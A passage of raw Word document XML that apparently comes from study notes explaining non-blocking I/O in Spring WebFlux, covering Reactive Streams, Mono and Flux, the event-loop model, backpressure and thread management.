        </w:tabs>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You are using non-reactive libraries or third-party libraries that don't support asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED77B9"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Use Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516DD1C" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Your application handles many concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D3A09" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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You are dealing with I/O-bound tasks (e.g., reading from databases, files, calling external APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37185452" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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You need better scalability, such as for real-time applications, microservices, or web APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B679A97" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A273AB"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Blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more traditional, where a thread waits for I/O operations to complete before moving on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C0E4F" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, as in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allows threads to be free and handle multiple requests at once, leading to better scalability, performance, and efficiency in I/O-bound applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E728E85"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969E04E">
          <v:rect id="_x0000_i2285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD26DAB" w14:textId="6A33C61C"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499" w:name="_Toc196307979"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle concurrency</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="6FA0B914" w14:textId="5A4CEAAF" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Spring WebFlux handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming principles</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations. It leverages asynchronous mechanisms to manage a large number of concurrent requests efficiently without blocking threads. Let's break down how Spring WebFlux handles concurrency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9337F" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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1. Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24695319"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In traditional, blocking I/O models, each thread handles one request and waits for I/O operations (like database queries or HTTP calls) to complete. This can lead to thread contention and high memory usage as the number of requests increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5B641"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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, on the other hand, uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where threads don't get blocked while waiting for I/O operations to complete. Instead, the thread is freed up to handle other requests, and once the operation completes, the result is pushed to the application in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DC317"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This enables Spring WebFlux to handle a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large number of concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently using fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61421D59" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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2. Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CD0EC"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Spring WebFlux uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to handle asynchronous data processing. The main components of reactive streams are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997D5A9" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A source of data (such as a database or API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC8BC3" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A consumer that processes the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA89BC" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A middle component that may transform or filter the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842DF98"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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the core abstractions in Spring WebFlux that implement the reactive stream's </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08888C16" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a single asynchronous value or an empty value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972CE81" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a sequence of asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446912A4"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These abstractions allow Spring WebFlux to manage concurrency effectively by processing the data asynchronously without blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCE716" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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3. Event Loop Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A39F1BD"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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model (typically via </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the underlying server), which means that a small number of threads (event loops) are responsible for handling many requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBA2B8"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The event loop model is highly efficient in I/O-bound operations (like making external API calls, database queries) because it does not require one thread per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E5C7C"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When an I/O operation is initiated (for example, reading from a database), the event loop thread does not block. Instead, it moves on to handle other requests. When the operation completes, the event loop thread processes the result and continues with the next tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EF39C" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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4. Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E49D76"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">One of the challenges in handling concurrency with asynchronous systems is controlling the flow of data when a subscriber cannot keep up with the publisher's rate of data production. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mechanism that handles this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11798007"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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that subscribers can signal their capability to handle data by providing backpressure signals. If a subscriber is overwhelmed, it can tell the publisher to pause sending more data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D313CF1"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Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows Spring WebFlux to handle large streams of data without overwhelming the system, ensuring that resources are not exhausted, and the application remains responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBF6CA" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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5. Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31378C5C"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Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactor threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when using the default </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> library) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event loop threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to handle multiple requests concurrently. This contrasts with traditional thread-per-request models (like in Spring MVC), where a thread is allocated for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B106B41"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By using non-blocking I/O and event loop-based thread models, Spring WebFlux can handle thousands of concurrent requests with a small pool of threads, optimizing resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF818A" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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6. Concurrency Model in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22497EAD"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Event-driven and non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: WebFlux does not block threads while waiting for responses (e.g., from a database or external API). Instead, it registers a callback and proceeds to handle other requests. When the result is ready, it’s processed and sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D69EB"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Thread reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
